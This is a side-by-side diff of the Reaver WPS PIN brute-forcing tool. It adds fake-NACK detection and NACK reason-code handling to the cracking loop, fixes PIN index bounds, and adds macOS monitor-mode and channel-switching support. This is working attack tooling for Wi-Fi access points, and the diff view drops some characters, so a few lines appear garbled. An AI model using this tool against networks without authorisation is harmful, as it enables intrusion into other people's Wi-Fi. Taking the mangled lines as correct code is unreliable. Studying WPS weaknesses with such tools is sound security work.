323	418	attempts = get_p1_index() + get_p2_index();
324	419	}
325		/*
326		* If we've found the first half of the key, then the entire key1 keyspace
327		* has been exhausted/eliminated. Our output should reflect that.
328		*/
	420	// If we've found the first half of the key, then the entire key1 keyspace
	421	// has been exhausted/eliminated. Our output should reflect that.
329	422	else if(get_key_status() == KEY2_WIP)
330	423	{
331	424	attempts = P1_SIZE + get_p2_index();

+1

-0

src/cracker.h less more

48	48
49	49	void crack();
50	50	void advance_pin_count();
	51	int get_cracking_done();
51	52	int get_pin_count();
52	53	void display_status(time_t start_time);
53	54

+1

-0

src/crypto/Makefile less more

10	10
11	11	CFLAGS += -DCONFIG_TLS_INTERNAL_CLIENT
12	12	CFLAGS += -DCONFIG_TLS_INTERNAL_SERVER
	13	CFLAGS += -fno-strict-aliasing
13	14	#CFLAGS += -DALL_DH_GROUPS
14	15
15	16	LIB_OBJS= \

+1

-1

src/crypto/md5-internal.c less more

187	187	MD5Transform(ctx->buf, (u32 *) ctx->in);
188	188	byteReverse((unsigned char *) ctx->buf, 4);
189	189	os_memcpy(digest, ctx->buf, 16);
190		os_memset(ctx, 0, sizeof(ctx)); /* In case it's sensitive */
	190	os_memset(ctx, 0, sizeof(ctx)); / In case it's sensitive */
191	191	}
192	192
193	193	/* The four core functions - F1 is optimized somewhat */

+8

-5

src/defs.h less more

0	0	/*
1	1	* Reaver - Common definitions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

84	85	#define DEFAULT_DELAY 1 /* Seconds */
85	86	#define DEFAULT_TIMEOUT 5 /* Seconds */
86	87	#define DEFAULT_LOCK_DELAY 60 /* Seconds */
	88	#define DEFAULT_FK_NACK_DELAY 0 /* Seconds */
87	89	#define SEC_TO_US 1000000 /* uSeconds in a Second */
88	90
89	91	#define TSFT_SIZE 8

136	138	KEY_REJECTED = 1,
137	139	RX_TIMEOUT = 2,
138	140	EAP_FAIL = 3,
139		UNKNOWN_ERROR = 4
	141	UNKNOWN_ERROR = 4,
	142	FAKE_NACK = 5
140	143	};
141	144
142	145	enum nack_code

310	313	{
311	314	struct frame_control fc;
312	315	uint16_t duration;
313		unsigned char addr1[MAC_ADDR_LEN];
314		unsigned char addr2[MAC_ADDR_LEN];
315		unsigned char addr3[MAC_ADDR_LEN];
316		uint16_t frag_seq;
	316	unsigned char addr1[MAC_ADDR_LEN]; //Destnation address
	317	unsigned char addr2[MAC_ADDR_LEN]; //Transmiter address
	318	unsigned char addr3[MAC_ADDR_LEN]; //Source address
	319	uint16_t frag_seq; // Fragment : 4; Sequence : 12
317	320	};
318	321
319	322	struct authentication_management_frame

+57

-23

src/exchange.c less more

0	0	/*
1	1	* Reaver - WPS exchange functions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

150	151	tx_type = SEND_WSC_NACK;
151	152	break;
152	153	case NACK:
153		cprintf(VERBOSE, "[+] Received WSC NACK\n");
	154	cprintf(VERBOSE, "[+] Received WSC NACK (reason: 0x%04X)\n",get_nack_reason());
154	155	got_nack = 1;
155	156	break;
156	157	case TERMINATE:
157	158	terminated = 1;
158	159	break;
	160	case UNKNOWN:
	161	// cprintf(VERBOSE, "[+] Received UNKNOWN packet\n");
	162	break;
159	163	default:
160		if(packet_type != 0)
161		{
162		cprintf(VERBOSE, "[!] WARNING: Unexpected packet received (0x%.02X), terminating transaction\n", packet_type);
163		terminated = 1;
164		}
	164	cprintf(VERBOSE, "[!] WARNING: Unexpected packet received (0x%.02X), terminating transaction\n", packet_type);
	165	terminated = 1;
165	166	break;
166	167	}
167	168

179	180	* packet, since the timer is started by send_msg. Manually start the timer to
180	181	* prevent infinite loops.
181	182	*/
182		else if(packet_type != 0)
	183	else if(packet_type != UNKNOWN)
183	184	{
184	185	start_timer();
185	186	}

211	212	/*
212	213	* There are four states that can signify a pin failure:
213	214	*
214		* o Got NACK instead of an M5 message (first half of pin wrong)
215		* o Got NACK instead of an M7 message (second half of pin wrong)
216		* o Got receive timeout while waiting for an M5 message (first half of pin wrong)
217		* o Got receive timeout while waiting for an M7 message (second half of pin wrong)
	215	* o Got NACK instead of an M5 message (first half of pin wrong)
	216	* o Got NACK instead of an M5 message, when cracking second half (fake NACK)
	217	* o Got NACK instead of an M7 message (second half of pin wrong)
	218	* o Got receive timeout while waiting for an M5 message (first half of pin wrong)
	219	* o Got receive timeout while waiting for an M7 message (second half of pin wrong)
218	220	*/
219	221	if(got_nack)
220	222	{

223	225	* SEND_WSC_NACK, indicating that we need to reply with a NACK. So check the
224	226	* previous state to see what state we were in when the NACK was received.
225	227	*/
226		if(last_msg == M3 \|\| last_msg == M5)
227		{
228		/* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */
229		set_timeout_is_nack(0);
230
231		ret_val = KEY_REJECTED;
232		}
233		else
234		{
235		ret_val = UNKNOWN_ERROR;
	228
	229
	230	/* Warning the user about change of reason code for the received NACK message. */
	231	if (!get_ignore_nack_reason())
	232	{
	233	if ((get_last_nack_reason() >= 0) && (get_nack_reason() != get_last_nack_reason()))
	234	{
	235	cprintf(WARNING, "[!] WARNING: The reason code for NACK has been changed. Potential FAKE NACK!\n");
	236	}
	237	set_last_nack_reason( get_nack_reason() );
	238	}
	239
	240	/* Check NACK reason code for */
	241	if ((get_fake_nack_reason() >= 0) && (get_nack_reason() == get_fake_nack_reason()))
	242	{
	243	ret_val = FAKE_NACK;
	244	} else {
	245	if ((last_msg == M3) \|\| (last_msg == M5))
	246	{
	247	/* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */
	248	set_timeout_is_nack(0);
	249
	250	/* bug fix made by KokoSoft */
	251	ret_val = ((last_msg == M3) && (get_key_status() == KEY2_WIP)) ? FAKE_NACK : KEY_REJECTED;
	252	}
	253	else
	254	{
	255	ret_val = UNKNOWN_ERROR;
	256	}
236	257	}
237	258	}
238	259	else if(premature_timeout)

429	450	struct wfa_element_header element = { 0 };
430	451	int i = 0, header_size = sizeof(struct wfa_element_header);
431	452
	453	if (data_size == 0)
	454	{
	455	/*
	456	* Treat zero data length WPS messages as NACKs.
	457	* Required for certain APs that emit empty WPS messages in place of NACKs.
	458	*/
	459	type = NACK;
	460	set_nack_reason(NO_ERROR);
	461	}
432	462	/* Shove data into a wpabuf structure for processing */
433		msg = wpabuf_alloc_copy(data, data_size);
434		if(msg)
	463	else if (msg = wpabuf_alloc_copy(data, data_size))
435	464	{
436	465	/* Process the incoming message */
437	466	wps_registrar_process_msg(wps, get_opcode(), msg);

457	486	{
458	487	case MESSAGE_TYPE:
459	488	type = (uint8_t) element_data[0];
	489	break;
	490	case CONFIGURATION_ERROR:
	491	/* Check element_data length */
	492	if ( element.length == 2)
	493	set_nack_reason( htons( ( (uint16_t) element_data) ) );
460	494	break;
461	495	default:
462	496	break;

+69

-20

src/globule.c less more

0	0	/*
1	1	* Reaver - Global variable access functions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

31	32	*/
32	33
33	34	#include "globule.h"
	35	#include "misc.h"
34	36
35	37	int globule_init()
36	38	{

104	106
105	107	void set_p1_index(int index)
106	108	{
107		if(index < P1_SIZE)
	109	if(index <= P1_SIZE)
108	110	{
109	111	cprintf(VERBOSE,"[+] p1_index set to %i\n",index);
110	112	globule->p1_index = index;

117	119
118	120	void set_p2_index(int index)
119	121	{
120		if(index <= P2_SIZE + globule->exhaustive*(P1_SIZE - P2_SIZE))
	122	if(index <= P2_SIZE + (globule->exhaustive ? (P1_SIZE - P2_SIZE) : 0) )
121	123	{
122	124	cprintf(VERBOSE,"[+] p2_index set to %i\n",index);
123	125	globule->p2_index = index;

232	234	return globule->ignore_locks;
233	235	}
234	236
	237	void set_fake_nack_delay(int delay)
	238	{
	239	globule->fake_nack_delay = delay;
	240	}
	241	int get_fake_nack_delay()
	242	{
	243	return globule->fake_nack_delay;
	244	}
	245
235	246	void set_eap_terminate(int value)
236	247	{
237	248	globule->eap_terminate = value;

251	262	return globule->max_pin_attempts;
252	263	}
253	264
	265	void set_quit_pin_attempts(int value)
	266	{
	267	globule->quit_pin_attempts = value;
	268	}
	269
	270	int get_quit_pin_attempts()
	271	{
	272	return globule->quit_pin_attempts;
	273	}
	274
254	275	void set_pixie_loop(int value)
255	276	{
256	277	globule->pixie_loop = value;

261	282	return globule->pixie_loop;
262	283	}
263	284
	285	void set_pixie_log(int value)
	286	{
	287	globule->pixie_log = value;
	288	}
	289
	290	int get_pixie_log()
	291	{
	292	return globule->pixie_log;
	293	}
	294
264	295	void set_max_num_probes(int value)
265	296	{
266	297	globule->max_num_probes = value;

342	373	return globule->auto_channel_select;
343	374	}
344	375
345		void set_auto_detect_options(int value)
346		{
347		globule->auto_detect_options = value;
348		}
349		int get_auto_detect_options()
350		{
351		return globule->auto_detect_options;
352		}
353
354	376	void set_wifi_band(int value)
355	377	{
356	378	globule->wifi_band = value;

398	420
399	421	void set_bssid(unsigned char *value)
400	422	{
401		memcpy((unsigned char *) &globule->bssid, value, MAC_ADDR_LEN);
	423	memcpy(globule->bssid, value, MAC_ADDR_LEN);
402	424	}
403	425	unsigned char *get_bssid()
404	426	{
405		return (unsigned char *) &globule->bssid;
	427	return globule->bssid;
406	428	}
407	429
408	430	void set_mac(unsigned char *value)
409	431	{
410		memcpy((unsigned char *) &globule->mac, value, MAC_ADDR_LEN);
	432	memcpy(globule->mac, value, MAC_ADDR_LEN);
411	433	}
412	434	unsigned char *get_mac()
413	435	{
414		return (unsigned char *) &globule->mac;
	436	return globule->mac;
415	437	}
416	438
417	439	void set_ssid(char *value)

499	521	void set_exhaustive(int value)
500	522	{
501	523	globule->exhaustive = value;
502		if(value == 1)
503		{
504		globule->max_pin_attempts=P1_SIZE+P1_SIZE;
	524	if(value)
	525	{
	526	set_max_pin_attempts(P1_SIZE + P1_SIZE);
505	527	}
506	528	}
507	529

528	550	return globule->external_association;
529	551	}
530	552
531		void set_nack_reason(enum nack_code value)
	553	void set_nack_reason(uint16_t value)
532	554	{
533	555	globule->nack_reason = value;
534	556	}
535		enum nack_code get_nack_reason()
	557	uint16_t get_nack_reason()
536	558	{
537	559	return globule->nack_reason;
	560	}
	561
	562	void set_last_nack_reason(int value)
	563	{
	564	globule->last_nack_reason = value;
	565	}
	566	int get_last_nack_reason()
	567	{
	568	return globule->last_nack_reason;
	569	}
	570
	571	void set_fake_nack_reason(int value)
	572	{
	573	globule->fake_nack_reason = value;
	574	}
	575	int get_fake_nack_reason()
	576	{
	577	return globule->fake_nack_reason;
	578	}
	579
	580	void set_ignore_nack_reason(int value)
	581	{
	582	globule->ignore_nack_reason = value;
	583	}
	584	int get_ignore_nack_reason()
	585	{
	586	return globule->ignore_nack_reason;
538	587	}
539	588
540	589	void set_handle(pcap_t *value)

+33

-13

src/globule.h less more

0	0	/*
1	1	* Reaver - Global variable access functions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

38	39	struct globals
39	40	{
40	41	int pixie_loop; /* Loops through up to M4 */
	42	int pixie_log; /* Logs PixieDust hashes to executing directory */
41	43	int last_wps_state; /* Holds the previous WPS state as stored in wps->state */
42	44
43	45	int p1_index; /* Index into p1 array for building WPS pins */

62	64
63	65	int win7_compat; /* Set to 1 to make WPS messages mimic Windows 7 settings. */
64	66
65		int exhaustive; /* Set to 1 to use exhaustive pin generation instead of checksum the last digit */
	67	int exhaustive; /* Set to 1 to use exhaustive pin generation instead of checksum the last digit, and restart if pin wasn't found.
	68	* Automatically set to 2, when checksum mode was not successful. */
66	69
67	70	int delay; /* Seconds to sleep in between key attempts */
68	71

74	77
75	78	int ignore_locks; /* Ignore locked state */
76	79
	80	int fake_nack_delay; /* Seconds to sleep after received fake NACK. */
	81
77	82	int recurring_delay_count; /* Enter a recurring delay after recurring_delay_count pin attempts */
78	83
79	84	int eap_terminate; /* Experimental */
80	85
81	86	int max_pin_attempts; /* Maximum number of pin attempts */
82	87
	88	int quit_pin_attempts; /* Number of pin attempts to quit */
	89
83	90	int rx_timeout; /* Receive timeout period (seconds) */
84	91
85	92	int timeout_is_nack; /* Treat M5/M7 receive timeouts as NACKs (only needed for shoddy WPS implementations) */

96	103
97	104	int auto_channel_select; /* Diables automatic parsing and changing of the current channel number, as specified in the AP's beacon packet */
98	105
99		int auto_detect_options; /* If true, Reaver will auto detect the best command line options for the attack */
100
101	106	int wifi_band; /* Determines if we use the A/N bands or B/G bands */
102	107
103	108	int channel; /* Holds the current channel number */

132	137
133	138	char exec_string; / Pointer to user-supplied command to execute upon success */
134	139
135		enum nack_code nack_reason; /* Stores the nack code for the last received WSC_NACK message */
	140	uint16_t nack_reason; /* Stores the nack code for the last received WSC_NACK message */
	141	int last_nack_reason; /* Stores the nack code for the previously received WSC_NACK message */
	142	int fake_nack_reason; /* The nack code used in FAKE NACK message */
	143	int ignore_nack_reason; /* Ignore the nack code for received WSC_NACK message */
136	144
137	145	pcap_t handle; / Pcap handle */
138	146

141	149	* function calls.
142	150	*/
143	151
144		int op_pixie; /make pixiewps/
145		char cmd_reaver_test[4000]; /auto reaver with pin /
146		int op_autopass; /auto reaver with pin/
147		int stop_in_m1;
148		int op_gen_pin;
	152	int op_pixie; /* make pixiewps */
	153	char cmd_reaver_test[4000]; /* auto reaver with pin */
	154	int op_autopass; /* auto reaver with pin */
	155	int stop_in_m1; /* stop reaver in m1 message */
	156	int op_gen_pin; /* gen default pin */
	157
149	158
150	159	} *globule;
151	160

183	192	int get_lock_delay();
184	193	void set_ignore_locks(int value);
185	194	int get_ignore_locks();
	195	void set_fake_nack_delay(int delay);
	196	int get_fake_nack_delay();
186	197	void set_eap_terminate(int value);
187	198	int get_eap_terminate();
188	199	void set_max_pin_attempts(int value);

205	216	int get_fixed_channel();
206	217	void set_auto_channel_select(int value);
207	218	int get_auto_channel_select();
208		void set_auto_detect_options(int value);
209		int get_auto_detect_options();
210	219	void set_wifi_band(int value);
211	220	int get_wifi_band();
212	221	void set_opcode(enum wsc_op_code value);

239	248	int get_dh_small(void);
240	249	void set_external_association(int value);
241	250	int get_external_association(void);
242		void set_nack_reason(enum nack_code value);
243		enum nack_code get_nack_reason();
	251	void set_nack_reason(uint16_t value);
	252	uint16_t get_nack_reason();
	253	void set_last_nack_reason(int value);
	254	int get_last_nack_reason();
	255	void set_fake_nack_reason(int value);
	256	int get_fake_nack_reason();
	257	void set_ignore_nack_reason(int value);
	258	int get_ignore_nack_reason();
244	259	void set_handle(pcap_t *value);
245	260	pcap_t *get_handle();
246	261	void set_wps(struct wps_data *value);

251	266	char *get_exec_string(void);
252	267	void set_oo_send_nack(int value);
253	268	int get_oo_send_nack(void);
	269	int get_quit_pin_attempts();
254	270	void set_op_pixie(int index);
255	271	void set_op_autopass(int index);
	272	void set_op_gen_pin(int index);
256	273	void set_cmd_reaver_test(char *string);
257	274	void set_pixie_loop(int value);
258	275	int get_pixie_loop();
	276	void set_pixie_log(int value);
	277	int get_pixie_log();
259	278	void set_stop_in_m1(int index);
	279	void set_quit_pin_attempts(int value);
260	280
261	281
262	282	#endif

+53

-12

src/iface.c less more

33	33	#include "iface.h"
34	34
35	35	/* Populates globule->mac with the MAC address of the interface globule->iface */
	36	#ifdef __APPLE__
	37	int read_iface_mac() {
	38	struct ifaddrs* iflist;
	39	int found = 0;
	40	if (getifaddrs(&iflist) == 0) {
	41	struct ifaddrs* cur;
	42	for (cur = iflist; cur; cur = cur->ifa_next) {
	43	if ((cur->ifa_addr->sa_family == AF_LINK) &&
	44	(strcmp(cur->ifa_name, get_iface()) == 0) &&
	45	cur->ifa_addr) {
	46	struct sockaddr_dl* sdl = (struct sockaddr_dl*)cur->ifa_addr;
	47	set_mac(LLADDR(sdl));
	48	found = 1;
	49	break;
	50	}
	51	}
	52
	53	freeifaddrs(iflist);
	54	}
	55	return found;
	56	}
	57	#else
36	58	int read_iface_mac()
37	59	{
38	60	struct ifreq ifr;

67	89
68	90	return ret_val;
69	91	}
70
	92	#endif
71	93	/*
72	94	* Goes to the next 802.11 channel.
73	95	* This is mostly required for APs that hop channels, which usually hop between channels 1, 6, and 11.

82	104	int an_channels[] = AN_CHANNELS;
83	105	int *channels = NULL;
84	106
	107	/* Only switch channels if fixed channel operation is disabled */
	108	if(get_fixed_channel())
	109	{
	110	return 0;
	111	}
	112
85	113	/* Select the appropriate channels for the target 802.11 band */
86	114	if(get_wifi_band() == AN_BAND)
87	115	{

94	122	n = sizeof(bg_channels) / sizeof(int);
95	123	}
96	124
97		/* Only switch channels if fixed channel operation is disabled */
98		if(!get_fixed_channel())
	125	i++;
	126
	127	if((i >= n) \|\| i < 0)
99	128	{
100		i++;
101
102		if((i >= n) \|\| i < 0)
103		{
104		i = 0;
105		}
106
107		return change_channel(channels[i]);
	129	i = 0;
108	130	}
109	131
110		return 0;
	132	return change_channel(channels[i]);
111	133	}
112	134
113	135	/* Sets the 802.11 channel for the selected interface */
	136	#ifdef __APPLE__
	137	int change_channel(int channel)
	138	{
	139	cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel);
	140	// Unfortunately, there is no API to change the channel
	141	pid_t pid = fork();
	142	if (!pid) {
	143	char chan_arg[32];
	144	sprintf(chan_arg, "-c%d", channel);
	145	char* argv[] = {"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", chan_arg, NULL};
	146	execve("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", argv, NULL);
	147	}
	148	int status;
	149	waitpid(pid,&status,0);
	150	set_channel(channel);
	151	return 0;
	152	}
	153	#else
114	154	int change_channel(int channel)
115	155	{
116	156	int skfd = 0, ret_val = 0;

145	185
146	186	return ret_val;
147	187	}
	188	#endif⏎

+9

-0

src/iface.h less more

34	34	#define IFACE_H
35	35
36	36	#include <sys/ioctl.h>
	37	#ifdef __APPLE__
	38	#include <sys/socket.h>
	39	#include <net/ethernet.h>
	40	#include <ifaddrs.h>
	41	#include <net/if_dl.h>
	42	#endif
37	43	#include <net/if.h>
38	44	#include <netinet/in.h>
	45
	46	#ifndef __APPLE__
39	47	#include "lwe/iwlib.h"
	48	#endif
40	49
41	50	#include "defs.h"
42	51	#include "globule.h"

+24

-1

src/init.c less more

120	120	pcap_t *handle = NULL;
121	121	char errbuf[PCAP_ERRBUF_SIZE] = { 0 };
122	122
123		handle = pcap_open_live(capture_source, BUFSIZ, 1, 0, errbuf);
	123	#ifdef __APPLE__
	124	// must disassociate from any current AP. This is the only way.
	125	pid_t pid = fork();
	126	if (!pid) {
	127	char* argv[] = {"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", "-z", NULL};
	128	execve("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", argv, NULL);
	129	}
	130	int status;
	131	waitpid(pid,&status,0);
	132
	133
	134	handle = pcap_create(capture_source,errbuf);
	135	if (handle) {
	136	pcap_set_snaplen(handle, 65535);
	137	pcap_set_timeout(handle, 50);
	138	pcap_set_rfmon(handle, 1);
	139	pcap_set_promisc(handle, 1);
	140	int status = pcap_activate(handle);
	141	if (status)
	142	cprintf(CRITICAL, "pcap_activate status %d\n", status);
	143	}
	144	#else
	145	handle = pcap_open_live(capture_source, 65535, 1, 0, errbuf);
	146	#endif
124	147	if(!handle)
125	148	{
126	149	handle = pcap_open_offline(capture_source, errbuf);

+0

-8

~~src/libwps/Makefile~~ less more

0		CC=gcc
1		CFLAGS=-Wall
2
3		libwps.o:
4		$(CC) $(CFLAGS) libwps.c -c
5
6		clean:
7		rm -f *.o

+11

-21

src/libwps/libwps.c less more

303	303	/* Convert raw data to a hex string */
304	304	char hex2str(unsigned char hex, int len)
305	305	{
306		char *str = NULL;
307		int str_len = 0, i = 0;
308		char tmp_str[3] = { 0 };
309
310		str_len = (len * 2);
311
312		str = malloc(str_len+1);
313		if(str)
314		{
315		memset(str, 0, (str_len+1));
316
317		for(i=0; i<len; i++)
318		{
319		memset((char *) &tmp_str, 0, sizeof(tmp_str));
320		snprintf((char *) &tmp_str, sizeof(tmp_str), "%.2X", hex[i]);
321		strncat(str, (char *) &tmp_str, 2);
322		}
323		}
324
325		return str;
326		}
	306	static const char atab[] = "0123456789abcdef";
	307	char str = malloc((len2)+1), *out=str;
	308	if(!str) return 0;
	309	for(;len;hex++,len--) {
	310	(out++) = atab[hex >> 4];
	311	(out++) = atab[hex & 0xf];
	312	}
	313	*out = 0;
	314	return str;
	315	}
	316

+3

-0

src/libwps/libwps.h less more

11	11	#ifndef LIBWPS_H
12	12	#define LIBWPS_H
13	13
	14	#undef _GNU_SOURCE
	15	#define _GNU_SOURCE
	16	#include <sys/types.h>
14	17	#include <stdlib.h>
15	18	#include <stdint.h>
16	19	#include <stdio.h>

+44

-44

src/lwe/iwlib.c less more

31	31	*/
32	32	struct iw15_range
33	33	{
34		__u32 throughput;
35		__u32 min_nwid;
36		__u32 max_nwid;
37		__u16 num_channels;
38		__u8 num_frequency;
	34	uint32_t throughput;
	35	uint32_t min_nwid;
	36	uint32_t max_nwid;
	37	uint16_t num_channels;
	38	uint8_t num_frequency;
39	39	struct iw_freq freq[IW15_MAX_FREQUENCIES];
40		__s32 sensitivity;
	40	int32_t sensitivity;
41	41	struct iw_quality max_qual;
42		__u8 num_bitrates;
43		__s32 bitrate[IW15_MAX_BITRATES];
44		__s32 min_rts;
45		__s32 max_rts;
46		__s32 min_frag;
47		__s32 max_frag;
48		__s32 min_pmp;
49		__s32 max_pmp;
50		__s32 min_pmt;
51		__s32 max_pmt;
52		__u16 pmp_flags;
53		__u16 pmt_flags;
54		__u16 pm_capa;
55		__u16 encoding_size[IW15_MAX_ENCODING_SIZES];
56		__u8 num_encoding_sizes;
57		__u8 max_encoding_tokens;
58		__u16 txpower_capa;
59		__u8 num_txpower;
60		__s32 txpower[IW15_MAX_TXPOWER];
61		__u8 we_version_compiled;
62		__u8 we_version_source;
63		__u16 retry_capa;
64		__u16 retry_flags;
65		__u16 r_time_flags;
66		__s32 min_retry;
67		__s32 max_retry;
68		__s32 min_r_time;
69		__s32 max_r_time;
	42	uint8_t num_bitrates;
	43	int32_t bitrate[IW15_MAX_BITRATES];
	44	int32_t min_rts;
	45	int32_t max_rts;
	46	int32_t min_frag;
	47	int32_t max_frag;
	48	int32_t min_pmp;
	49	int32_t max_pmp;
	50	int32_t min_pmt;
	51	int32_t max_pmt;
	52	uint16_t pmp_flags;
	53	uint16_t pmt_flags;
	54	uint16_t pm_capa;
	55	uint16_t encoding_size[IW15_MAX_ENCODING_SIZES];
	56	uint8_t num_encoding_sizes;
	57	uint8_t max_encoding_tokens;
	58	uint16_t txpower_capa;
	59	uint8_t num_txpower;
	60	int32_t txpower[IW15_MAX_TXPOWER];
	61	uint8_t we_version_compiled;
	62	uint8_t we_version_source;
	63	uint16_t retry_capa;
	64	uint16_t retry_flags;
	65	uint16_t r_time_flags;
	66	int32_t min_retry;
	67	int32_t max_retry;
	68	int32_t min_r_time;
	69	int32_t max_r_time;
70	70	struct iw_quality avg_qual;
71	71	};
72	72

1657	1657	const char * ifname,
1658	1658	const char * input,
1659	1659	unsigned char * key,
1660		__u16 * flags)
	1660	uint16_t * flags)
1661	1661	{
1662	1662	int keylen = 0;
1663	1663	char * p;

2314	2314	1, /* IW_PRIV_TYPE_BYTE */
2315	2315	1, /* IW_PRIV_TYPE_CHAR */
2316	2316	0, /* Not defined */
2317		sizeof(__u32), /* IW_PRIV_TYPE_INT */
	2317	sizeof(uint32_t), /* IW_PRIV_TYPE_INT */
2318	2318	sizeof(struct iw_freq), /* IW_PRIV_TYPE_FLOAT */
2319	2319	sizeof(struct sockaddr), /* IW_PRIV_TYPE_ADDR */
2320	2320	0, /* Not defined */

2346	2346	/* Type of headers we know about (basically union iwreq_data) */
2347	2347	#define IW_HEADER_TYPE_NULL 0 /* Not available */
2348	2348	#define IW_HEADER_TYPE_CHAR 2 /* char [IFNAMSIZ] */
2349		#define IW_HEADER_TYPE_UINT 4 /* __u32 */
	2349	#define IW_HEADER_TYPE_UINT 4 /* uint32_t */
2350	2350	#define IW_HEADER_TYPE_FREQ 5 /* struct iw_freq */
2351	2351	#define IW_HEADER_TYPE_ADDR 6 /* struct sockaddr */
2352	2352	#define IW_HEADER_TYPE_POINT 8 /* struct iw_point */

2373	2373	*/
2374	2374	struct iw_ioctl_description
2375	2375	{
2376		__u8 header_type; /* NULL, iw_point or other */
2377		__u8 token_type; /* Future */
2378		__u16 token_size; /* Granularity of payload */
2379		__u16 min_tokens; /* Min acceptable token number */
2380		__u16 max_tokens; /* Max acceptable token number */
2381		__u32 flags; /* Special handling of the request */
	2376	uint8_t header_type; /* NULL, iw_point or other */
	2377	uint8_t token_type; /* Future */
	2378	uint16_t token_size; /* Granularity of payload */
	2379	uint16_t min_tokens; /* Min acceptable token number */
	2380	uint16_t max_tokens; /* Max acceptable token number */
	2381	uint32_t flags; /* Special handling of the request */
2382	2382	};
2383	2383
2384	2384	/* -------------------------- VARIABLES -------------------------- */

2826	2826	* Fixing that in the kernel would break 64 bits userspace. */
2827	2827	if((token_len != extra_len) && (extra_len >= 4))
2828	2828	{
2829		__u16 alt_dlen = ((__u16 ) pointer);
	2829	uint16_t alt_dlen = ((uint16_t ) pointer);
2830	2830	unsigned int alt_token_len = alt_dlen * descr->token_size;
2831	2831	if((alt_token_len + 8) == extra_len)
2832	2832	{

+14

-18

src/lwe/iwlib.h less more

16	16	/*************************** INCLUDES ***************************/
17	17
18	18	/* Standard headers */
	19	#undef _GNU_SOURCE
	20	#define _GNU_SOURCE
	21	#undef _BSD_SOURCE
	22	#define _BSD_SOURCE
19	23	#include <sys/types.h>
20	24	#include <sys/ioctl.h>
21	25	#include <stdio.h>

44	48	#include <netinet/in.h> /* For struct sockaddr_in */
45	49	#include <netinet/if_ether.h>
46	50
47		/* Fixup to be able to include kernel includes in userspace.
48		* Basically, kill the sparse annotations... Jean II */
49		#ifndef __user
50		#define __user
51		#endif
52
53		#include <linux/types.h> /* for "caddr_t" et al */
54
55		/* Glibc systems headers are supposedly less problematic than kernel ones */
	51	/* system headers are supposedly less problematic than kernel ones */
56	52	#include <sys/socket.h> /* for "struct sockaddr" et al */
57	53	#include <net/if.h> /* for IFNAMSIZ and co... */
58	54

128	124	#define IW_EV_LCP_PK_LEN (4)
129	125	/* Size of the various events when packed in stream */
130	126	#define IW_EV_CHAR_PK_LEN (IW_EV_LCP_PK_LEN + IFNAMSIZ)
131		#define IW_EV_UINT_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(__u32))
	127	#define IW_EV_UINT_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(uint32_t))
132	128	#define IW_EV_FREQ_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(struct iw_freq))
133	129	#define IW_EV_PARAM_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(struct iw_param))
134	130	#define IW_EV_ADDR_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(struct sockaddr))

137	133
138	134	struct iw_pk_event
139	135	{
140		__u16 len; /* Real lenght of this stuff */
141		__u16 cmd; /* Wireless IOCTL */
	136	uint16_t len; /* Real lenght of this stuff */
	137	uint16_t cmd; /* Wireless IOCTL */
142	138	union iwreq_data u; /* IOCTL fixed payload */
143	139	} __attribute__ ((packed));
144	140	struct iw_pk_point
145	141	{
146		void __user pointer; / Pointer to the data (in user space) */
147		__u16 length; /* number of fields or size in bytes */
148		__u16 flags; /* Optional params */
	142	void pointer; / Pointer to the data (in user space) */
	143	uint16_t length; /* number of fields or size in bytes */
	144	uint16_t flags; /* Optional params */
149	145	} __attribute__ ((packed));
150	146
151	147	#define IW_EV_LCP_PK2_LEN (sizeof(struct iw_pk_event) - sizeof(union iwreq_data))

383	379	const char * ifname,
384	380	const char * input,
385	381	unsigned char * key,
386		__u16 * flags);
	382	uint16_t * flags);
387	383	/* ----------------- POWER MANAGEMENT SUBROUTINES ----------------- */
388	384	void
389	385	iw_print_pm_value(char * buffer,

501	497	/*
502	498	* Wrapper to push some Wireless Parameter in the driver
503	499	*/
504		static inline int
	500	static int
505	501	iw_set_ext(int skfd, /* Socket to the kernel */
506	502	const char * ifname, /* Device name */
507	503	int request, /* WE ID */

517	513	/*
518	514	* Wrapper to extract some Wireless Parameter out of the driver
519	515	*/
520		static inline int
	516	static int
521	517	iw_get_ext(int skfd, /* Socket to the kernel */
522	518	const char * ifname, /* Device name */
523	519	int request, /* WE ID */

+96

-99

src/lwe/wireless.21.h less more

8	8
9	9	#ifndef _LINUX_WIRELESS_H
10	10	#define _LINUX_WIRELESS_H
	11
	12	#include <stdint.h>
11	13
12	14	/************************ DOCUMENTATION ************************/
13	15	/*

71	73	/* This header is used in user-space, therefore need to be sanitised
72	74	* for that purpose. Those includes are usually not compatible with glibc.
73	75	* To know which includes to use in user-space, check iwlib.h. */
74		#ifdef __KERNEL__
75		#include <linux/types.h> /* for "caddr_t" et al */
76		#include <linux/socket.h> /* for "struct sockaddr" et al */
77		#include <linux/if.h> /* for IFNAMSIZ and co... */
78		#endif /* __KERNEL__ */
79	76
